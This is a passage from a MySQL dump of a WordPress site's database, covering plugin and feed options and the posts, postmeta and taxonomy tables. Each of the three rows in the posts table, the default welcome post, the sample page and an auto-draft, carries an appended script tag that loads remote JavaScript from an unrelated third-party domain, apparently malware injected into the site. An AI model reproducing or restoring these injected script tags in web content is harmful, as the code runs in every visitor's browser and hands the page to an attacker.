Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";O:42:\"Requests_Utility_CaseInsensitiveDictionary\":1:{s:7:\"\0*\0data\";a:8:{s:6:\"server\";s:5:\"nginx\";s:4:\"date\";s:29:\"Wed, 07 Mar 2018 00:42:06 GMT\";s:12:\"content-type\";s:8:\"text/xml\";s:4:\"vary\";s:15:\"Accept-Encoding\";s:13:\"last-modified\";s:29:\"Wed, 07 Mar 2018 00:30:26 GMT\";s:15:\"x-frame-options\";s:10:\"SAMEORIGIN\";s:4:\"x-nc\";s:9:\"HIT ord 2\";s:16:\"content-encoding\";s:4:\"gzip\";}}s:5:\"build\";s:14:\"20130911080210\";}','no'),(139,'_transient_timeout_feed_mod_d117b5738fbd35bd8c0391cda1f2b5d9','1520426526','no'),(140,'_transient_feed_mod_d117b5738fbd35bd8c0391cda1f2b5d9','1520383326','no'),(141,'_transient_timeout_dash_v2_88ae138922fe95674369b1cb3d215a2b','1520426526','no'),(142,'_transient_dash_v2_88ae138922fe95674369b1cb3d215a2b','<div class=\"rss-widget\"><ul><li><a class=\'rsswidget\' href=\'https://wordpress.org/news/2018/03/the-month-in-wordpress-february-2018/\'>The Month in WordPress: February 2018</a></li></ul></div><div class=\"rss-widget\"><ul><li><a class=\'rsswidget\' href=\'https://wptavern.com/wordpress-now-used-on-30-of-the-top-10-million-sites\'>WPTavern: WordPress Now Used on 30% of the Top 10 Million Sites</a></li><li><a class=\'rsswidget\' href=\'https://wptavern.com/new-plugin-makes-wordpress-core-updates-more-secure-by-requiring-cryptographic-signature-verification\'>WPTavern: New Plugin Makes WordPress Core Updates More Secure by Requiring Cryptographic Signature Verification</a></li><li><a class=\'rsswidget\' href=\'https://poststatus.com/marketing-positioning-wordpress-products-draft-podcast/\'>Post Status: Marketing and positioning WordPress products — Draft podcast</a></li></ul></div>','no'),(143,'can_compress_scripts','1','no'),(151,'wpclone_directory_scan','a:4:{s:6:\"dbsize\";s:9:\"505.15 KB\";s:4:\"size\";s:7:\"7.23 MB\";s:5:\"files\";i:454;s:4:\"time\";i:1520383371;}','yes'),(152,'_transient_is_multi_author','0','yes'),(144,'_transient_timeout_plugin_slugs','1520469754','no'),(145,'_transient_plugin_slugs','a:4:{i:0;s:19:\"akismet/akismet.php\";i:1;s:9:\"hello.php\";i:2;s:34:\"wp-clone-by-wp-academy/wpclone.php\";i:3;s:24:\"wpforms-lite/wpforms.php\";}','no'),(146,'recently_activated','a:0:{}','yes'),(147,'_site_transient_timeout_poptags_40cd750bba9870f18aada2478b24840a','1520394138','no'),(148,'_site_transient_poptags_40cd750bba9870f18aada2478b24840a','O:8:\"stdClass\":100:{s:6:\"widget\";a:3:{s:4:\"name\";s:6:\"widget\";s:4:\"slug\";s:6:\"widget\";s:5:\"count\";i:4435;}s:11:\"woocommerce\";a:3:{s:4:\"name\";s:11:\"woocommerce\";s:4:\"slug\";s:11:\"woocommerce\";s:5:\"count\";i:2616;}s:4:\"post\";a:3:{s:4:\"name\";s:4:\"post\";s:4:\"slug\";s:4:\"post\";s:5:\"count\";i:2543;}s:5:\"admin\";a:3:{s:4:\"name\";s:5:\"admin\";s:4:\"slug\";s:5:\"admin\";s:5:\"count\";i:2408;}s:5:\"posts\";a:3:{s:4:\"name\";s:5:\"posts\";s:4:\"slug\";s:5:\"posts\";s:5:\"count\";i:1857;}s:9:\"shortcode\";a:3:{s:4:\"name\";s:9:\"shortcode\";s:4:\"slug\";s:9:\"shortcode\";s:5:\"count\";i:1636;}s:8:\"comments\";a:3:{s:4:\"name\";s:8:\"comments\";s:4:\"slug\";s:8:\"comments\";s:5:\"count\";i:1626;}s:7:\"twitter\";a:3:{s:4:\"name\";s:7:\"twitter\";s:4:\"slug\";s:7:\"twitter\";s:5:\"count\";i:1447;}s:6:\"google\";a:3:{s:4:\"name\";s:6:\"google\";s:4:\"slug\";s:6:\"google\";s:5:\"count\";i:1383;}s:6:\"images\";a:3:{s:4:\"name\";s:6:\"images\";s:4:\"slug\";s:6:\"images\";s:5:\"count\";i:1380;}s:8:\"facebook\";a:3:{s:4:\"name\";s:8:\"facebook\";s:4:\"slug\";s:8:\"facebook\";s:5:\"count\";i:1373;}s:5:\"image\";a:3:{s:4:\"name\";s:5:\"image\";s:4:\"slug\";s:5:\"image\";s:5:\"count\";i:1300;}s:7:\"sidebar\";a:3:{s:4:\"name\";s:7:\"sidebar\";s:4:\"slug\";s:7:\"sidebar\";s:5:\"count\";i:1282;}s:3:\"seo\";a:3:{s:4:\"name\";s:3:\"seo\";s:4:\"slug\";s:3:\"seo\";s:5:\"count\";i:1186;}s:7:\"gallery\";a:3:{s:4:\"name\";s:7:\"gallery\";s:4:\"slug\";s:7:\"gallery\";s:5:\"count\";i:1085;}s:4:\"page\";a:3:{s:4:\"name\";s:4:\"page\";s:4:\"slug\";s:4:\"page\";s:5:\"count\";i:1057;}s:6:\"social\";a:3:{s:4:\"name\";s:6:\"social\";s:4:\"slug\";s:6:\"social\";s:5:\"count\";i:1012;}s:5:\"email\";a:3:{s:4:\"name\";s:5:\"email\";s:4:\"slug\";s:5:\"email\";s:5:\"count\";i:992;}s:9:\"ecommerce\";a:3:{s:4:\"name\";s:9:\"ecommerce\";s:4:\"slug\";s:9:\"ecommerce\";s:5:\"count\";i:866;}s:5:\"login\";a:3:{s:4:\"name\";s:5:\"login\";s:4:\"slug\";s:5:\"login\";s:5:\"count\";i:860;}s:5:\"links\";a:3:{s:4:\"name\";s:5:\"links\";s:4:\"slug\";s:5:\"links\";s:5:\"count\";i:822;}s:7:\"widgets\";a:3:{s:4:\"name\";s:7:\"widgets\";s:4:\"slug\";s:7:\"widgets\";s:5:\"count\";i:796;}s:5:\"video\";a:3:{s:4:\"name\";s:5:\"video\";s:4:\"slug\";s:5:\"video\";s:5:\"count\";i:790;}s:8:\"security\";a:3:{s:4:\"name\";s:8:\"security\";s:4:\"slug\";s:8:\"security\";s:5:\"count\";i:696;}s:7:\"content\";a:3:{s:4:\"name\";s:7:\"content\";s:4:\"slug\";s:7:\"content\";s:5:\"count\";i:689;}s:3:\"rss\";a:3:{s:4:\"name\";s:3:\"rss\";s:4:\"slug\";s:3:\"rss\";s:5:\"count\";i:682;}s:10:\"buddypress\";a:3:{s:4:\"name\";s:10:\"buddypress\";s:4:\"slug\";s:10:\"buddypress\";s:5:\"count\";i:674;}s:4:\"spam\";a:3:{s:4:\"name\";s:4:\"spam\";s:4:\"slug\";s:4:\"spam\";s:5:\"count\";i:668;}s:5:\"pages\";a:3:{s:4:\"name\";s:5:\"pages\";s:4:\"slug\";s:5:\"pages\";s:5:\"count\";i:654;}s:6:\"slider\";a:3:{s:4:\"name\";s:6:\"slider\";s:4:\"slug\";s:6:\"slider\";s:5:\"count\";i:651;}s:6:\"jquery\";a:3:{s:4:\"name\";s:6:\"jquery\";s:4:\"slug\";s:6:\"jquery\";s:5:\"count\";i:639;}s:9:\"analytics\";a:3:{s:4:\"name\";s:9:\"analytics\";s:4:\"slug\";s:9:\"analytics\";s:5:\"count\";i:635;}s:5:\"media\";a:3:{s:4:\"name\";s:5:\"media\";s:4:\"slug\";s:5:\"media\";s:5:\"count\";i:630;}s:4:\"feed\";a:3:{s:4:\"name\";s:4:\"feed\";s:4:\"slug\";s:4:\"feed\";s:5:\"count\";i:609;}s:10:\"e-commerce\";a:3:{s:4:\"name\";s:10:\"e-commerce\";s:4:\"slug\";s:10:\"e-commerce\";s:5:\"count\";i:607;}s:6:\"search\";a:3:{s:4:\"name\";s:6:\"search\";s:4:\"slug\";s:6:\"search\";s:5:\"count\";i:598;}s:4:\"ajax\";a:3:{s:4:\"name\";s:4:\"ajax\";s:4:\"slug\";s:4:\"ajax\";s:5:\"count\";i:598;}s:4:\"form\";a:3:{s:4:\"name\";s:4:\"form\";s:4:\"slug\";s:4:\"form\";s:5:\"count\";i:586;}s:4:\"menu\";a:3:{s:4:\"name\";s:4:\"menu\";s:4:\"slug\";s:4:\"menu\";s:5:\"count\";i:585;}s:8:\"category\";a:3:{s:4:\"name\";s:8:\"category\";s:4:\"slug\";s:8:\"category\";s:5:\"count\";i:584;}s:5:\"embed\";a:3:{s:4:\"name\";s:5:\"embed\";s:4:\"slug\";s:5:\"embed\";s:5:\"count\";i:556;}s:10:\"javascript\";a:3:{s:4:\"name\";s:10:\"javascript\";s:4:\"slug\";s:10:\"javascript\";s:5:\"count\";i:541;}s:4:\"link\";a:3:{s:4:\"name\";s:4:\"link\";s:4:\"slug\";s:4:\"link\";s:5:\"count\";i:535;}s:3:\"css\";a:3:{s:4:\"name\";s:3:\"css\";s:4:\"slug\";s:3:\"css\";s:5:\"count\";i:528;}s:5:\"share\";a:3:{s:4:\"name\";s:5:\"share\";s:4:\"slug\";s:5:\"share\";s:5:\"count\";i:518;}s:7:\"youtube\";a:3:{s:4:\"name\";s:7:\"youtube\";s:4:\"slug\";s:7:\"youtube\";s:5:\"count\";i:511;}s:7:\"comment\";a:3:{s:4:\"name\";s:7:\"comment\";s:4:\"slug\";s:7:\"comment\";s:5:\"count\";i:510;}s:5:\"theme\";a:3:{s:4:\"name\";s:5:\"theme\";s:4:\"slug\";s:5:\"theme\";s:5:\"count\";i:504;}s:9:\"dashboard\";a:3:{s:4:\"name\";s:9:\"dashboard\";s:4:\"slug\";s:9:\"dashboard\";s:5:\"count\";i:489;}s:10:\"responsive\";a:3:{s:4:\"name\";s:10:\"responsive\";s:4:\"slug\";s:10:\"responsive\";s:5:\"count\";i:486;}s:6:\"custom\";a:3:{s:4:\"name\";s:6:\"custom\";s:4:\"slug\";s:6:\"custom\";s:5:\"count\";i:485;}s:6:\"editor\";a:3:{s:4:\"name\";s:6:\"editor\";s:4:\"slug\";s:6:\"editor\";s:5:\"count\";i:485;}s:10:\"categories\";a:3:{s:4:\"name\";s:10:\"categories\";s:4:\"slug\";s:10:\"categories\";s:5:\"count\";i:476;}s:12:\"contact-form\";a:3:{s:4:\"name\";s:12:\"contact form\";s:4:\"slug\";s:12:\"contact-form\";s:5:\"count\";i:469;}s:3:\"ads\";a:3:{s:4:\"name\";s:3:\"ads\";s:4:\"slug\";s:3:\"ads\";s:5:\"count\";i:464;}s:9:\"affiliate\";a:3:{s:4:\"name\";s:9:\"affiliate\";s:4:\"slug\";s:9:\"affiliate\";s:5:\"count\";i:462;}s:6:\"button\";a:3:{s:4:\"name\";s:6:\"button\";s:4:\"slug\";s:6:\"button\";s:5:\"count\";i:454;}s:4:\"tags\";a:3:{s:4:\"name\";s:4:\"tags\";s:4:\"slug\";s:4:\"tags\";s:5:\"count\";i:449;}s:4:\"user\";a:3:{s:4:\"name\";s:4:\"user\";s:4:\"slug\";s:4:\"user\";s:5:\"count\";i:435;}s:7:\"contact\";a:3:{s:4:\"name\";s:7:\"contact\";s:4:\"slug\";s:7:\"contact\";s:5:\"count\";i:424;}s:6:\"mobile\";a:3:{s:4:\"name\";s:6:\"mobile\";s:4:\"slug\";s:6:\"mobile\";s:5:\"count\";i:423;}s:3:\"api\";a:3:{s:4:\"name\";s:3:\"api\";s:4:\"slug\";s:3:\"api\";s:5:\"count\";i:417;}s:5:\"users\";a:3:{s:4:\"name\";s:5:\"users\";s:4:\"slug\";s:5:\"users\";s:5:\"count\";i:417;}s:5:\"photo\";a:3:{s:4:\"name\";s:5:\"photo\";s:4:\"slug\";s:5:\"photo\";s:5:\"count\";i:416;}s:5:\"stats\";a:3:{s:4:\"name\";s:5:\"stats\";s:4:\"slug\";s:5:\"stats\";s:5:\"count\";i:411;}s:9:\"slideshow\";a:3:{s:4:\"name\";s:9:\"slideshow\";s:4:\"slug\";s:9:\"slideshow\";s:5:\"count\";i:410;}s:6:\"photos\";a:3:{s:4:\"name\";s:6:\"photos\";s:4:\"slug\";s:6:\"photos\";s:5:\"count\";i:401;}s:6:\"events\";a:3:{s:4:\"name\";s:6:\"events\";s:4:\"slug\";s:6:\"events\";s:5:\"count\";i:395;}s:10:\"statistics\";a:3:{s:4:\"name\";s:10:\"statistics\";s:4:\"slug\";s:10:\"statistics\";s:5:\"count\";i:391;}s:10:\"navigation\";a:3:{s:4:\"name\";s:10:\"navigation\";s:4:\"slug\";s:10:\"navigation\";s:5:\"count\";i:383;}s:7:\"payment\";a:3:{s:4:\"name\";s:7:\"payment\";s:4:\"slug\";s:7:\"payment\";s:5:\"count\";i:371;}s:4:\"news\";a:3:{s:4:\"name\";s:4:\"news\";s:4:\"slug\";s:4:\"news\";s:5:\"count\";i:361;}s:8:\"calendar\";a:3:{s:4:\"name\";s:8:\"calendar\";s:4:\"slug\";s:8:\"calendar\";s:5:\"count\";i:355;}s:10:\"shortcodes\";a:3:{s:4:\"name\";s:10:\"shortcodes\";s:4:\"slug\";s:10:\"shortcodes\";s:5:\"count\";i:353;}s:5:\"popup\";a:3:{s:4:\"name\";s:5:\"popup\";s:4:\"slug\";s:5:\"popup\";s:5:\"count\";i:347;}s:7:\"plugins\";a:3:{s:4:\"name\";s:7:\"plugins\";s:4:\"slug\";s:7:\"plugins\";s:5:\"count\";i:343;}s:12:\"social-media\";a:3:{s:4:\"name\";s:12:\"social media\";s:4:\"slug\";s:12:\"social-media\";s:5:\"count\";i:340;}s:9:\"marketing\";a:3:{s:4:\"name\";s:9:\"marketing\";s:4:\"slug\";s:9:\"marketing\";s:5:\"count\";i:339;}s:9:\"multisite\";a:3:{s:4:\"name\";s:9:\"multisite\";s:4:\"slug\";s:9:\"multisite\";s:5:\"count\";i:337;}s:4:\"chat\";a:3:{s:4:\"name\";s:4:\"chat\";s:4:\"slug\";s:4:\"chat\";s:5:\"count\";i:335;}s:10:\"newsletter\";a:3:{s:4:\"name\";s:10:\"newsletter\";s:4:\"slug\";s:10:\"newsletter\";s:5:\"count\";i:334;}s:4:\"list\";a:3:{s:4:\"name\";s:4:\"list\";s:4:\"slug\";s:4:\"list\";s:5:\"count\";i:333;}s:4:\"code\";a:3:{s:4:\"name\";s:4:\"code\";s:4:\"slug\";s:4:\"code\";s:5:\"count\";i:332;}s:3:\"url\";a:3:{s:4:\"name\";s:3:\"url\";s:4:\"slug\";s:3:\"url\";s:5:\"count\";i:329;}s:4:\"meta\";a:3:{s:4:\"name\";s:4:\"meta\";s:4:\"slug\";s:4:\"meta\";s:5:\"count\";i:328;}s:15:\"payment-gateway\";a:3:{s:4:\"name\";s:15:\"payment gateway\";s:4:\"slug\";s:15:\"payment-gateway\";s:5:\"count\";i:321;}s:8:\"redirect\";a:3:{s:4:\"name\";s:8:\"redirect\";s:4:\"slug\";s:8:\"redirect\";s:5:\"count\";i:315;}s:5:\"forms\";a:3:{s:4:\"name\";s:5:\"forms\";s:4:\"slug\";s:5:\"forms\";s:5:\"count\";i:310;}s:16:\"custom-post-type\";a:3:{s:4:\"name\";s:16:\"custom post type\";s:4:\"slug\";s:16:\"custom-post-type\";s:5:\"count\";i:305;}s:11:\"advertising\";a:3:{s:4:\"name\";s:11:\"advertising\";s:4:\"slug\";s:11:\"advertising\";s:5:\"count\";i:303;}s:6:\"simple\";a:3:{s:4:\"name\";s:6:\"simple\";s:4:\"slug\";s:6:\"simple\";s:5:\"count\";i:301;}s:3:\"tag\";a:3:{s:4:\"name\";s:3:\"tag\";s:4:\"slug\";s:3:\"tag\";s:5:\"count\";i:300;}s:7:\"adsense\";a:3:{s:4:\"name\";s:7:\"adsense\";s:4:\"slug\";s:7:\"adsense\";s:5:\"count\";i:295;}s:4:\"html\";a:3:{s:4:\"name\";s:4:\"html\";s:4:\"slug\";s:4:\"html\";s:5:\"count\";i:292;}s:12:\"notification\";a:3:{s:4:\"name\";s:12:\"notification\";s:4:\"slug\";s:12:\"notification\";s:5:\"count\";i:291;}s:8:\"tracking\";a:3:{s:4:\"name\";s:8:\"tracking\";s:4:\"slug\";s:8:\"tracking\";s:5:\"count\";i:289;}s:6:\"author\";a:3:{s:4:\"name\";s:6:\"author\";s:4:\"slug\";s:6:\"author\";s:5:\"count\";i:287;}s:16:\"google-analytics\";a:3:{s:4:\"name\";s:16:\"google analytics\";s:4:\"slug\";s:16:\"google-analytics\";s:5:\"count\";i:287;}s:11:\"performance\";a:3:{s:4:\"name\";s:11:\"performance\";s:4:\"slug\";s:11:\"performance\";s:5:\"count\";i:285;}s:8:\"lightbox\";a:3:{s:4:\"name\";s:8:\"lightbox\";s:4:\"slug\";s:8:\"lightbox\";s:5:\"count\";i:284;}}','no'),(150,'_site_transient_update_plugins','O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1520383353;s:7:\"checked\";a:4:{s:19:\"akismet/akismet.php\";s:5:\"4.0.2\";s:9:\"hello.php\";s:3:\"1.6\";s:34:\"wp-clone-by-wp-academy/wpclone.php\";s:5:\"2.2.4\";s:24:\"wpforms-lite/wpforms.php\";s:7:\"1.4.4.1\";}s:8:\"response\";a:1:{s:19:\"akismet/akismet.php\";O:8:\"stdClass\":11:{s:2:\"id\";s:21:\"w.org/plugins/akismet\";s:4:\"slug\";s:7:\"akismet\";s:6:\"plugin\";s:19:\"akismet/akismet.php\";s:11:\"new_version\";s:5:\"4.0.3\";s:3:\"url\";s:38:\"https://wordpress.org/plugins/akismet/\";s:7:\"package\";s:56:\"https://downloads.wordpress.org/plugin/akismet.4.0.3.zip\";s:5:\"icons\";a:3:{s:2:\"1x\";s:59:\"https://ps.w.org/akismet/assets/icon-128x128.png?rev=969272\";s:2:\"2x\";s:59:\"https://ps.w.org/akismet/assets/icon-256x256.png?rev=969272\";s:7:\"default\";s:59:\"https://ps.w.org/akismet/assets/icon-256x256.png?rev=969272\";}s:7:\"banners\";a:2:{s:2:\"1x\";s:61:\"https://ps.w.org/akismet/assets/banner-772x250.jpg?rev=479904\";s:7:\"default\";s:61:\"https://ps.w.org/akismet/assets/banner-772x250.jpg?rev=479904\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:5:\"4.9.4\";s:13:\"compatibility\";O:8:\"stdClass\":0:{}}}s:12:\"translations\";a:0:{}s:9:\"no_update\";a:3:{s:9:\"hello.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:25:\"w.org/plugins/hello-dolly\";s:4:\"slug\";s:11:\"hello-dolly\";s:6:\"plugin\";s:9:\"hello.php\";s:11:\"new_version\";s:3:\"1.6\";s:3:\"url\";s:42:\"https://wordpress.org/plugins/hello-dolly/\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/plugin/hello-dolly.1.6.zip\";s:5:\"icons\";a:3:{s:2:\"1x\";s:63:\"https://ps.w.org/hello-dolly/assets/icon-128x128.jpg?rev=969907\";s:2:\"2x\";s:63:\"https://ps.w.org/hello-dolly/assets/icon-256x256.jpg?rev=969907\";s:7:\"default\";s:63:\"https://ps.w.org/hello-dolly/assets/icon-256x256.jpg?rev=969907\";}s:7:\"banners\";a:2:{s:2:\"1x\";s:65:\"https://ps.w.org/hello-dolly/assets/banner-772x250.png?rev=478342\";s:7:\"default\";s:65:\"https://ps.w.org/hello-dolly/assets/banner-772x250.png?rev=478342\";}s:11:\"banners_rtl\";a:0:{}}s:34:\"wp-clone-by-wp-academy/wpclone.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:36:\"w.org/plugins/wp-clone-by-wp-academy\";s:4:\"slug\";s:22:\"wp-clone-by-wp-academy\";s:6:\"plugin\";s:34:\"wp-clone-by-wp-academy/wpclone.php\";s:11:\"new_version\";s:5:\"2.2.4\";s:3:\"url\";s:53:\"https://wordpress.org/plugins/wp-clone-by-wp-academy/\";s:7:\"package\";s:71:\"https://downloads.wordpress.org/plugin/wp-clone-by-wp-academy.2.2.4.zip\";s:5:\"icons\";a:0:{}s:7:\"banners\";a:2:{s:2:\"1x\";s:76:\"https://ps.w.org/wp-clone-by-wp-academy/assets/banner-772x250.jpg?rev=706555\";s:7:\"default\";s:76:\"https://ps.w.org/wp-clone-by-wp-academy/assets/banner-772x250.jpg?rev=706555\";}s:11:\"banners_rtl\";a:0:{}}s:24:\"wpforms-lite/wpforms.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:26:\"w.org/plugins/wpforms-lite\";s:4:\"slug\";s:12:\"wpforms-lite\";s:6:\"plugin\";s:24:\"wpforms-lite/wpforms.php\";s:11:\"new_version\";s:7:\"1.4.4.1\";s:3:\"url\";s:43:\"https://wordpress.org/plugins/wpforms-lite/\";s:7:\"package\";s:55:\"https://downloads.wordpress.org/plugin/wpforms-lite.zip\";s:5:\"icons\";a:3:{s:2:\"1x\";s:65:\"https://ps.w.org/wpforms-lite/assets/icon-128x128.png?rev=1371112\";s:2:\"2x\";s:65:\"https://ps.w.org/wpforms-lite/assets/icon-256x256.png?rev=1371112\";s:7:\"default\";s:65:\"https://ps.w.org/wpforms-lite/assets/icon-256x256.png?rev=1371112\";}s:7:\"banners\";a:3:{s:2:\"2x\";s:68:\"https://ps.w.org/wpforms-lite/assets/banner-1544x500.png?rev=1371112\";s:2:\"1x\";s:67:\"https://ps.w.org/wpforms-lite/assets/banner-772x250.png?rev=1371112\";s:7:\"default\";s:68:\"https://ps.w.org/wpforms-lite/assets/banner-1544x500.png?rev=1371112\";}s:11:\"banners_rtl\";a:0:{}}}}','no');
/*!40000 ALTER TABLE `wpcn_options` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpcn_postmeta`
--

DROP TABLE IF EXISTS `wpcn_postmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpcn_postmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `post_id` (`post_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcn_postmeta`
--

LOCK TABLES `wpcn_postmeta` WRITE;
/*!40000 ALTER TABLE `wpcn_postmeta` DISABLE KEYS */;
INSERT INTO `wpcn_postmeta` VALUES (1,2,'_wp_page_template','default');
/*!40000 ALTER TABLE `wpcn_postmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpcn_posts`
--

DROP TABLE IF EXISTS `wpcn_posts`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpcn_posts` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_author` bigint(20) unsigned NOT NULL DEFAULT 0,
  `post_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_title` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_excerpt` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_status` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'publish',
  `comment_status` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'open',
  `ping_status` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'open',
  `post_password` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `post_name` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `to_ping` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `pinged` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content_filtered` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `guid` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `menu_order` int(11) NOT NULL DEFAULT 0,
  `post_type` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'post',
  `post_mime_type` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_count` bigint(20) NOT NULL DEFAULT 0,
  PRIMARY KEY (`ID`),
  KEY `post_name` (`post_name`(191)),
  KEY `type_status_date` (`post_type`,`post_status`,`post_date`,`ID`),
  KEY `post_parent` (`post_parent`),
  KEY `post_author` (`post_author`)
) ENGINE=MyISAM AUTO_INCREMENT=4 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcn_posts`
--

LOCK TABLES `wpcn_posts` WRITE;
/*!40000 ALTER TABLE `wpcn_posts` DISABLE KEYS */;
INSERT INTO `wpcn_posts` VALUES (1,1,'2018-03-07 00:41:39','2018-03-07 00:41:39','Welcome to WordPress. This is your first post. Edit or delete it, then start writing!<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Hello world!','','publish','open','open','','hello-world','','','2018-03-07 00:41:39','2018-03-07 00:41:39','',0,'http://ashbyresort.com/?p=1',0,'post','',1),(2,1,'2018-03-07 00:41:39','2018-03-07 00:41:39','This is an example page. It\'s different from a blog post because it will stay in one place and will show up in your site navigation (in most themes). Most people start with an About page that introduces them to potential site visitors. It might say something like this:\n\n<blockquote>Hi there! I\'m a bike messenger by day, aspiring actor by night, and this is my website. I live in Los Angeles, have a great dog named Jack, and I like pi&#241;a coladas. (And gettin\' caught in the rain.)</blockquote>\n\n...or something like this:\n\n<blockquote>The XYZ Doohickey Company was founded in 1971, and has been providing quality doohickeys to the public ever since. Located in Gotham City, XYZ employs over 2,000 people and does all kinds of awesome things for the Gotham community.</blockquote>\n\nAs a new WordPress user, you should go to <a href=\"http://ashbyresort.com/wp-admin/\">your dashboard</a> to delete this page and create new pages for your content. Have fun!<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Sample Page','','publish','closed','open','','sample-page','','','2018-03-07 00:41:39','2018-03-07 00:41:39','',0,'http://ashbyresort.com/?page_id=2',0,'page','',0),(3,1,'2018-03-07 00:42:03','0000-00-00 00:00:00','<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Auto Draft','','auto-draft','open','open','','','','','2018-03-07 00:42:03','0000-00-00 00:00:00','',0,'http://ashbyresort.com/?p=3',0,'post','',0);
/*!40000 ALTER TABLE `wpcn_posts` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpcn_term_relationships`
--

DROP TABLE IF EXISTS `wpcn_term_relationships`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpcn_term_relationships` (
  `object_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `term_taxonomy_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `term_order` int(11) NOT NULL DEFAULT 0,
  PRIMARY KEY (`object_id`,`term_taxonomy_id`),
  KEY `term_taxonomy_id` (`term_taxonomy_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcn_term_relationships`
--

LOCK TABLES `wpcn_term_relationships` WRITE;
/*!40000 ALTER TABLE `wpcn_term_relationships` DISABLE KEYS */;
INSERT INTO `wpcn_term_relationships` VALUES (1,1,0);
/*!40000 ALTER TABLE `wpcn_term_relationships` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpcn_term_taxonomy`
--

DROP TABLE IF EXISTS `wpcn_term_taxonomy`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpcn_term_taxonomy` (
  `term_taxonomy_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `taxonomy` varchar(32) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `description` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `count` bigint(20) NOT NULL DEFAULT 0,
  PRIMARY KEY (`term_taxonomy_id`),
  UNIQUE KEY `term_id_taxonomy` (`term_id`,`taxonomy`),
  KEY `taxonomy` (`taxonomy`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcn_term_taxonomy`
--

LOCK TABLES `wpcn_term_taxonomy` WRITE;
/*!40000 ALTER TABLE `wpcn_term_taxonomy` DISABLE KEYS */;
INSERT INTO `wpcn_term_taxonomy` VALUES (1,1,'category','',0,1);
/*!40000 ALTER TABLE `wpcn_term_taxonomy` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpcn_termmeta`
--

DROP TABLE IF EXISTS `wpcn_termmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpcn_termmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
